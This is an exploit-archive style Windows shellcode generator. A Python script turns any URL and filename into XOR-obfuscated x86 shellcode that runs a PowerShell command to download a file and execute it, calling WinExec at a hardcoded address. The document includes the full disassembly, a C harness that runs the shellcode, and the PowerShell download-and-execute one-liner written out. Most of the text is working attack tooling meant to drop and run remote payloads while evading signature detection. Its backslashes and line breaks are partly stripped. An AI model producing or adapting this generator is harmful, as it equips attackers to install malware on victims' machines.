#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator
#length: Dynamic ! depend on url and filename
#Date: 20 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate
#WinExec => 0x77b1e695
#ExitProcess => 0x77ae2acf
#====================================
#Execute :
#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:Ali.exe')};D:Ali.exe"
#====================================
#Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
####################################################
#How it work ?
'''
C:UsersAliDesktop>python "Windows x86 Download And Execute.py"
Enter url
Example: http://z3r0d4y.com/file.exe
Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe
Enter filename
Example: D:file.exe
Enter:C:Ali.exe
C:UsersAliDesktop>nasm -f elf shellcode.asm -o shellcode.o
C:UsersAliDesktop>objdump -D shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: 68 41 41 65 22 push $0x22654141
8: 58 pop %eax
9: c1 e8 08 shr $0x8,%eax
c: c1 e8 08 shr $0x8,%eax
f: 50 push %eax
10: b8 34 47 0b 4d mov $0x4d0b4734,%eax
15: bb 5d 69 6e 35 mov $0x356e695d,%ebx
1a: 31 d8 xor %ebx,%eax
1c: 50 push %eax
1d: b8 43 32 10 22 mov $0x22103243,%eax
22: bb 79 6e 51 4e mov $0x4e516e79,%ebx
27: 31 d8 xor %ebx,%eax
29: 50 push %eax
2a: b8 60 05 42 32 mov $0x32420560,%eax
2f: bb 49 78 79 71 mov $0x71797849,%ebx
34: 31 d8 xor %ebx,%eax
36: 50 push %eax
37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax
3c: bb 6a 64 49 33 mov $0x3349646a,%ebx
41: 31 d8 xor %ebx,%eax
43: 50 push %eax
44: b8 07 3e 0b 40 mov $0x400b3e07,%eax
49: bb 46 52 62 6e mov $0x6e625246,%ebx
4e: 31 d8 xor %ebx,%eax
50: 50 push %eax
51: b8 44 0a 78 07 mov $0x7780a44,%eax
56: bb 63 49 42 5b mov $0x5b424963,%ebx
5b: 31 d8 xor %ebx,%eax
5d: 50 push %eax
5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax
63: bb 6a 31 67 2d mov $0x2d67316a,%ebx
68: 31 d8 xor %ebx,%eax
6a: 50 push %eax
6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax
70: bb 61 4c 39 67 mov $0x67394c61,%ebx
75: 31 d8 xor %ebx,%eax
77: 50 push %eax
78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax
7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx
82: 31 d8 xor %ebx,%eax
84: 50 push %eax
85: b8 45 40 41 66 mov $0x66414045,%eax
8a: bb 3d 78 77 49 mov $0x4977783d,%ebx
8f: 31 d8 xor %ebx,%eax
91: 50 push %eax
92: b8 02 1f 4b 45 mov $0x454b1f02,%eax
97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx
9c: 31 d8 xor %ebx,%eax
9e: 50 push %eax
9f: b8 24 3e 19 32 mov $0x32193e24,%eax
a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx
a9: 31 d8 xor %ebx,%eax
ab: 50 push %eax
ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax
b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx
b6: 31 d8 xor %ebx,%eax
b8: 50 push %eax
b9: b8 1f 37 40 24 mov $0x2440371f,%eax
be: bb 6d 52 32 41 mov $0x4132526d,%ebx
c3: 31 d8 xor %ebx,%eax
c5: 50 push %eax
c6: b8 2e 35 68 31 mov $0x3168352e,%eax
cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx
d0: 31 d8 xor %ebx,%eax
d2: 50 push %eax
d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax
d8: bb 67 6e 69 61 mov $0x61696e67,%ebx
dd: 31 d8 xor %ebx,%eax
df: 50 push %eax
e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax
e5: bb 4f 45 62 33 mov $0x3362454f,%ebx
ea: 31 d8 xor %ebx,%eax
ec: 50 push %eax
ed: b8 20 57 1d 45 mov $0x451d5720,%eax
f2: bb 47 78 63 36 mov $0x36637847,%ebx
f7: 31 d8 xor %ebx,%eax
f9: 50 push %eax
fa: b8 04 6a 24 3b mov $0x3b246a04,%eax
ff: bb 77 44 4b 49 mov $0x494b4477,%ebx
104: 31 d8 xor %ebx,%eax
106: 50 push %eax
107: b8 18 0f 0a 32 mov $0x320a0f18,%eax
10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx
111: 31 d8 xor %ebx,%eax
113: 50 push %eax
114: b8 7d 18 3c 27 mov $0x273c187d,%eax
119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx
11e: 31 d8 xor %ebx,%eax
120: 50 push %eax
121: b8 03 44 60 60 mov $0x60604403,%eax
126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx
12b: 31 d8 xor %ebx,%eax
12d: 50 push %eax
12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax
133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx
138: 31 d8 xor %ebx,%eax
13a: 50 push %eax
13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax
140: bb 6c 37 47 45 mov $0x4547376c,%ebx
145: 31 d8 xor %ebx,%eax
147: 50 push %eax
148: b8 59 07 12 0e mov $0xe120759,%eax
14d: bb 35 68 73 6a mov $0x6a736835,%ebx
152: 31 d8 xor %ebx,%eax
154: 50 push %eax
155: b8 01 59 11 2c mov $0x2c115901,%eax
15a: bb 45 36 66 42 mov $0x42663645,%ebx
15f: 31 d8 xor %ebx,%eax
161: 50 push %eax
162: b8 22 22 4e 5a mov $0x5a4e2222,%eax
167: bb 4c 56 67 74 mov $0x7467564c,%ebx
16c: 31 d8 xor %ebx,%eax
16e: 50 push %eax
16f: b8 00 37 1b 48 mov $0x481b3700,%eax
174: bb 43 5b 72 2d mov $0x2d725b43,%ebx
179: 31 d8 xor %ebx,%eax
17b: 50 push %eax
17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax
181: bb 64 48 47 71 mov $0x71474864,%ebx
186: 31 d8 xor %ebx,%eax
188: 50 push %eax
189: b8 6a 23 03 18 mov $0x1803236a,%eax
18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx
193: 31 d8 xor %ebx,%eax
195: 50 push %eax
196: b8 2d 54 57 1c mov $0x1c57542d,%eax
19b: bb 47 31 34 68 mov $0x68343147,%ebx
1a0: 31 d8 xor %ebx,%eax
1a2: 50 push %eax
1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax
1a8: bb 39 38 79 38 mov $0x38793839,%ebx
1ad: 31 d8 xor %ebx,%eax
1af: 50 push %eax
1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax
1b5: bb 79 57 51 61 mov $0x61515779,%ebx
1ba: 31 d8 xor %ebx,%eax
1bc: 50 push %eax
1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax
1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx
1c7: 31 d8 xor %ebx,%eax
1c9: 50 push %eax
1ca: b8 2c 18 08 54 mov $0x5408182c,%eax
1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx
1d4: 31 d8 xor %ebx,%eax
1d6: 50 push %eax
1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax
1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx
1e1: 31 d8 xor %ebx,%eax
1e3: 50 push %eax
1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax
1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx
1ee: 31 d8 xor %ebx,%eax
1f0: 50 push %eax
1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax
1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx
1fb: 31 d8 xor %ebx,%eax
1fd: 50 push %eax
1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax
203: bb 39 44 61 4f mov $0x4f614439,%ebx
208: 31 d8 xor %ebx,%eax
20a: 50 push %eax
20b: 89 e0 mov %esp,%eax
20d: bb 41 41 41 01 mov $0x1414141,%ebx
212: c1 eb 08 shr $0x8,%ebx
215: c1 eb 08 shr $0x8,%ebx
218: c1 eb 08 shr $0x8,%ebx
21b: 53 push %ebx
21c: 50 push %eax
21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx
222: ff d3 call *%ebx
224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx
229: ff d3 call *%ebx
C:UsersAliDesktop>
#you have your shellcode now
=======================================
shellcode.c
#include <stdio.h>
#include <string.h>
int main(){
unsigned char shellcode[]= "x31xc0x50x68x41x41x65x22x58xc1xe8x08xc1xe8x08x50xb8x34x47x0bx4dxbbx5dx69x6ex35x31xd8x50xb8x43x32x10x22xbbx79x6ex51x4ex31xd8x50xb8x60x05x42x32xbbx49x78x79x71x31xd8x50xb8x0fx1cx2cx14xbbx6ax64x49x33x31xd8x50xb8x07x3ex0bx40xbbx46x52x62x6ex31xd8x50xb8x44x0ax78x07xbbx63x49x42x5bx31xd8x50xb8x0fx16x4bx0dxbbx6ax31x67x2dx31xd8x50xb8x18x62x5cx1fxbbx61x4cx39x67x31xd8x50xb8x1bx2dx1ex1fxbbx6bx58x6ax6bx31xd8x50xb8x45x40x41x66xbbx3dx78x77x49x31xd8x50xb8x02x1fx4bx45xbbx6dx6bx38x6ax31xd8x50xb8x24x3ex19x32xbbx45x4ex6ax5ax31xd8x50xb8x00x5ex3ax35xbbx6cx73x49x5bx31xd8x50xb8x1fx37x40x24xbbx6dx52x32x41x31xd8x50xb8x2ex35x68x31xbbx5ax4cx45x41x31xd8x50xb8x48x1ex1cx15xbbx67x6ex69x61x31xd8x50xb8x26x28x0dx5dxbbx4fx45x62x33x31xd8x50xb8x20x57x1dx45xbbx47x78x63x36x31xd8x50xb8x04x6ax24x3bxbbx77x44x4bx49x31xd8x50xb8x18x0fx0ax32xbbx6cx6ex78x47x31xd8x50xb8x7dx18x3cx27xbbx52x6cx5dx55x31xd8x50xb8x03x44x60x60xbbx77x34x5ax4fx31xd8x50xb8x47x6bx1fx20xbbx6fx4cx77x54x31xd8x50xb8x2ax5ex2bx20xbbx6cx37x47x45x31xd8x50xb8x59x07x12x0exbbx35x68x73x6ax31xd8x50xb8x01x59x11x2cxbbx45x36x66x42x31xd8x50xb8x22x22x4ex5axbbx4cx56x67x74x31xd8x50xb8x00x37x1bx48xbbx43x5bx72x2dx31xd8x50xb8x4ax1fx22x13xbbx64x48x47x71x31xd8x50xb8x6ax23x03x18xbbx4ax6dx66x6cx31xd8x50xb8x2dx54x57x1cxbbx47x31x34x68x31xd8x50xb8x4ex15x36x5axbbx39x38x79x38x31xd8x50xb8x59x7fx1fx04xbbx79x57x51x61x31xd8x50xb8x47x56x1dx2fxbbx65x70x3dx54x31xd8x50xb8x2cx18x08x54xbbx4dx76x6cx74x31xd8x50xb8x5ax34x58x1bxbbx39x5bx35x76x31xd8x50xb8x3fx0fx4bx41xbbx53x63x6bx6cx31xd8x50xb8x4ax1ex59x0bxbbx38x6dx31x6ex31xd8x50xb8x49x2bx16x2axbbx39x44x61x4fx31xd8x50x89xe0xbbx41x41x41x01xc1xebx08xc1xebx08xc1xebx08x53x50xbbx95xe6xb1x77xffxd3xbbxcfx2axaex77xffxd3";
fprintf(stdout,"Length: %d
",strlen(shellcode));
(*(void(*)()) shellcode)();
}
=======================================
C:UsersAliDesktop>gcc shellcode.c -o shellcode.exe
C:UsersAliDesktop>shellcode.exe
Length: 173
C:UsersAliDesktop>
#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second
'''
import random,binascii
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'
p1 = '''xor eax,eax
push eax
'''
p2 = '''
mov eax,esp
mov ebx,0x01414141
shr ebx,0x08
shr ebx,0x08
shr ebx,0x08
push ebx
push eax
mov ebx,0x77b1e695
call ebx
mov ebx,0x77ae2acf
call ebx
'''
sen1 = str(raw_input('Enter url
Example: http://z3r0d4y.com/file.exe
Enter:'))
sen1 = sen1.rsplit()
sen1 = sen1[0]
sen2 = str(raw_input('Enter filename
Example: D:\file.exe
Enter:'))
sen2 = sen2.rsplit()
sen2 = sen2[0]
sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)
m = 0
for word in sen:
m += 1
m = m - 1
stack = ''
while(m>=0):
stack += sen[m]
m -= 1
stack = stack.encode('hex')
skip = 1
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if len(stack) % 8 == 0:
zxzxzxz = 0
m = len(stack) / 8
c = 0
n = 0
z = 8
shf = open('shellcode.asm','w')
shf.write(p1)
shf.close()
shf = open('shellcode.asm','a')
while(c<m):
v = 'push 0x' + stack[n:z]
skip = 0
if '0x000000' in v:
skip = 1
q1 = v[13:]
v = 'push 0x' + q1 + '414141' + '
' + 'pop eax
shr eax,0x08
shr eax,0x08
shr eax,0x08
push eax
'
if '0x0000' in v:
skip = 1
q1 = v[11:]
v = 'push 0x' + q1 + '4141' + '
' + 'pop eax
shr eax,0x08
shr eax,0x08
push eax
'
if '0x00' in v:
skip = 1
q1 = v[9:]
v = 'push 0x' + q1 + '41' + '
' + 'pop eax
shr eax,0x08
push eax
'
if skip is 1:
shf.write(v)
if skip is 0:
v = v.rsplit()
zzz = ''
for w in v:
if '0x' in w:
zzz = str(w)
s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))
s1 = '0x%s'%s1
data = "%x" % (int(zzz, 16) ^ int(s1, 16))
v = 'mov eax,0x%s
mov ebx,%s
xor eax,ebx
push eax
'%(data,s1)
shf.write(v)
n += 8
z += 8
c += 1
shf.write(p2)
shf.close()
---恢复内容结束---